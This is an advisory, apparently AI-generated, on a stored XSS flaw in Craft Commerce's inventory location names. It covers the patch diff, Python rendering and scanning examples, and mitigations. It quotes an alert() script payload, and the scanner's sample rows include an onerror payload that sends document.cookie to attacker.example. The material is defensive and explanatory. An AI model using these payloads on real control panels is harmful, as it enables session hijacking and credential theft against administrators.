CVE-2026-29176 Overview
CVE-2026-29176 is a stored Cross-Site Scripting (XSS) vulnerability in Craft Commerce, the ecommerce plugin for Craft CMS. Prior to version 5.5.3, the Name field of an inventory location (managed under Commerce Settings - Inventory Locations) is rendered without HTML escaping when the purchasable stock field is displayed, so anyone who can set that name can store arbitrary JavaScript. The script executes when an administrator, or any user with product editing permissions, creates or edits a variant product.
Critical Impact
Attackers who already hold the privileges needed to manage inventory locations can plant a persistent script that executes in the browsers of other administrators, potentially leading to session hijacking, credential theft, or unauthorized administrative actions carried out with the victim's session.
Affected Products
- Craft Commerce versions prior to 5.5.3
- Craft CMS installations with Commerce plugin enabled
- craftcms craft_commerce (cpe:2.3:a:craftcms:craft_commerce:*:*:*:*:*:craft_cms:*:*)
Discovery Timeline
- 2026-03-10 - CVE-2026-29176 published to NVD
- 2026-03-11 - Last updated in NVD database
Technical Details for CVE-2026-29176
Vulnerability Analysis
This stored XSS vulnerability exists because of missing output encoding in the PurchasableStockField.php component. When inventory location names are rendered in the control panel, the application concatenates the location name straight into the markup without HTML encoding. Malicious JavaScript embedded in an inventory location name therefore persists in the database and executes whenever an administrator views or edits a variant product that references that location.
The vulnerability requires high privileges to exploit (the ability to create or edit inventory locations), but the payload affects every other privileged user who later loads an affected page. Because the attack surface is confined to the authenticated control panel, the practical risk is one privileged user attacking another, not exposure to anonymous visitors.
Root Cause
The root cause is a missing output-encoding step: the stock field template outputs the result of $inventoryLevel->getInventoryLocation()->name directly, without passing it through Html::encode(), so any HTML or JavaScript stored in the name is interpreted by the browser instead of being shown as text.
Attack Vector
This is a network-based attack requiring authenticated access with administrative privileges. An attacker with inventory location management permissions can:
- Navigate to Commerce Settings - Inventory Locations
- Create or modify an inventory location with a malicious name containing JavaScript (e.g., <script>alert('XSS')</script>)
- The payload persists in the database
- When any administrator (or user with product editing permissions) creates or edits a variant product, the malicious script executes in their browser context
The patch addresses this by properly encoding the location label before rendering:
// Vulnerable code (before patch)
$inventoryLevelTableRows .= Html::beginTag('tr') .
Html::beginTag('td') .
$inventoryLevel->getInventoryLocation()->name .
Html::endTag('td') .
// Fixed code (after patch)
$inventoryLevelTableRows .= Html::beginTag('tr') .
Html::beginTag('td') .
Html::encode($inventoryLevel->getInventoryLocation()->getUiLabel()) .
Html::endTag('td') .
Source: GitHub Commit da143df
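To make the before/after difference concrete, the following is an added illustration (not Craft Commerce code) that re-expresses the PHP snippet above in Python. html.escape() stands in for Craft's Html::encode(), and the InventoryLocation and InventoryLevel classes are minimal stand-ins for the real models; the assumption that getUiLabel() returns the display name is mine, not taken from the project.

```python
"""Vulnerable vs. fixed rendering of the inventory stock rows (added example, not Craft code).

html.escape() plays the role of Craft's Html::encode(); the model classes are stand-ins.
"""
from dataclasses import dataclass
from html import escape


@dataclass
class InventoryLocation:
    name: str

    def get_ui_label(self) -> str:
        # Assumption: mirrors the PHP getUiLabel() by returning the display name.
        return self.name


@dataclass
class InventoryLevel:
    location: InventoryLocation
    available: int


# Constructed attacker-chosen location name, as a privileged user could save it.
PAYLOAD = "<script>alert('XSS')</script>"


def render_rows_vulnerable(levels):
    """Before the patch: the raw location name is concatenated into the markup."""
    return "".join(
        f"<tr><td>{lvl.location.name}</td><td>{lvl.available}</td></tr>"
        for lvl in levels
    )


def render_rows_fixed(levels):
    """After the patch: the UI label is HTML-encoded before it reaches the browser.

    quote=True also encodes ' and ", which matters if the label ever lands inside an attribute.
    """
    return "".join(
        f"<tr><td>{escape(lvl.location.get_ui_label(), quote=True)}</td>"
        f"<td>{lvl.available}</td></tr>"
        for lvl in levels
    )


SAMPLE_LEVELS = [
    InventoryLevel(InventoryLocation("Warehouse A"), 12),
    InventoryLevel(InventoryLocation(PAYLOAD), 0),
]


def contains_live_script(markup: str) -> bool:
    """True if a <script> tag survived unencoded, i.e. the browser would execute it."""
    return "<script>" in markup


if __name__ == "__main__":
    print("vulnerable:", render_rows_vulnerable(SAMPLE_LEVELS))
    print("fixed:     ", render_rows_fixed(SAMPLE_LEVELS))
```

Running it shows the vulnerable renderer emitting the script tag verbatim, while the fixed renderer emits &lt;script&gt;..., which the browser displays as text.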
Detection Methods for CVE-2026-29176
Indicators of Compromise
- Unusual HTML tags or JavaScript code present in inventory location names in the database
- Inventory location entries containing <script>, onerror=, onclick=, or other event handler patterns
- Administrator reports of unexpected browser behavior when editing variant products
- Session tokens or credentials being sent to external domains
Detection Strategies
- Query the inventory locations table (craft_commerce_inventorylocations with the historical craft_ table prefix; the unprefixed name is commerce_inventorylocations, so adjust for your configured tablePrefix) for names containing angle brackets, on*= event-handler attributes, or javascript: URIs
- Serve a Content Security Policy with a report-to or report-uri directive so that blocked inline scripts generate violation reports you can alert on; CSP blocks on its own but only detects when reporting is configured
- Collect those CSP violation reports (or browser console errors during testing) from control panel sessions rather than relying on administrators to notice odd behaviour
- Audit administrative user activity logs for unusual inventory location creation or modification patterns
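The indicators and the table review above can be turned into a small scanner. The following is an added example, not part of the Craft Commerce project: it checks location names for the listed patterns both raw and after one round of HTML-entity decoding, so an entity-encoded payload is still caught. The rows are constructed inline so it runs offline; in practice you would feed it the output of a SELECT id, name query against the inventory locations table.

```python
"""Scan inventory location names for stored-XSS indicators (added example, not Craft code).

Rows are constructed (id, name) tuples; substitute the result of
SELECT id, name FROM <prefix>commerce_inventorylocations in a real review.
"""
import html
import re

# One regex per indicator: script tags, any HTML tag, event-handler attributes,
# script-capable URI schemes, and entity-encoded angle brackets that a later decode could revive.
INDICATORS = {
    "script_tag": re.compile(r"<\s*script\b", re.I),
    "html_tag": re.compile(r"<\s*/?\s*[a-z][\w-]*[^>]*>", re.I),
    "event_handler": re.compile(r"\bon[a-z]+\s*=", re.I),
    "script_uri": re.compile(r"\b(?:javascript|data|vbscript)\s*:", re.I),
    "encoded_angle": re.compile(r"&(?:lt|gt|#0*(?:60|62)|#x0*3[ce]);", re.I),
}


def scan_name(name: str):
    """Return the sorted indicator keys matched by one location name.

    The name is checked as stored and after html.unescape(), so
    '&lt;svg onload=alert(1)&gt;' is flagged for both the entities and the decoded tag.
    """
    hits = set()
    for candidate in (name, html.unescape(name)):
        for key, pattern in INDICATORS.items():
            if pattern.search(candidate):
                hits.add(key)
    return sorted(hits)


def scan_rows(rows):
    """rows: iterable of (id, name). Returns [(id, name, indicators)] for suspicious rows only."""
    findings = []
    for loc_id, name in rows:
        hits = scan_name(name)
        if hits:
            findings.append((loc_id, name, hits))
    return findings


# Constructed sample rows: two benign names, then three the attack vector above would produce.
SAMPLE_ROWS = [
    (1, "Main Warehouse"),
    (2, "Store #2 (Oak & Pine)"),
    (3, "<script>alert('XSS')</script>"),
    (4, 'Depot <img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">'),
    (5, "&lt;svg onload=alert(1)&gt;"),
]


if __name__ == "__main__":
    for loc_id, name, hits in scan_rows(SAMPLE_ROWS):
        print(f"location {loc_id}: {hits}  name={name!r}")
```

Benign names containing an ampersand or a hash are not flagged, because the patterns key on markup structure rather than on "special characters" generally; tune INDICATORS if your locations legitimately use angle brackets.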
Monitoring Recommendations
- Enable web application firewall (WAF) rules for stored XSS payloads in control panel form submissions, treating them as a secondary control, since the attacker here is an authenticated, privileged user
- Alert on inventory location creations or edits whose name contains angle brackets, on*= event-handler attributes, or HTML entities
- If browser-based XSS detection tooling is deployed, point it at control panel sessions, because that is the only place this payload executes
- Regularly audit administrative interface components for proper output encoding
How to Mitigate CVE-2026-29176
Immediate Actions Required
- Upgrade Craft Commerce to version 5.5.3 or later immediately
- Audit existing inventory location names for malicious content and sanitize any suspicious entries
- Review administrative user access and remove unnecessary privileges for inventory location management
- Implement Content Security Policy headers to provide defense-in-depth against XSS attacks
Patch Information
Craft Commerce version 5.5.3 addresses this vulnerability by HTML-encoding inventory location names before rendering them in the administrative interface. The fix replaces the direct output of the name property with Html::encode() applied to the result of getUiLabel().
Update your Craft Commerce installation via Composer, then run pending migrations and apply project config:
# Update Craft Commerce via Composer
composer require craftcms/commerce:^5.5.3
php craft migrate/all
php craft project-config/apply
(The two post-update steps can also be run together with php craft up.)
Workarounds
- Restrict access to the Commerce Settings - Inventory Locations page to only essential personnel until patching is complete
- Implement a strict Content Security Policy that blocks inline script execution (for example script-src 'self'), and verify the control panel still functions under it, since an overly strict policy can break the control panel's own scripts
- Manually review and sanitize all existing inventory location names in the database
- Consider temporarily disabling the inventory locations feature if not critical to operations
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.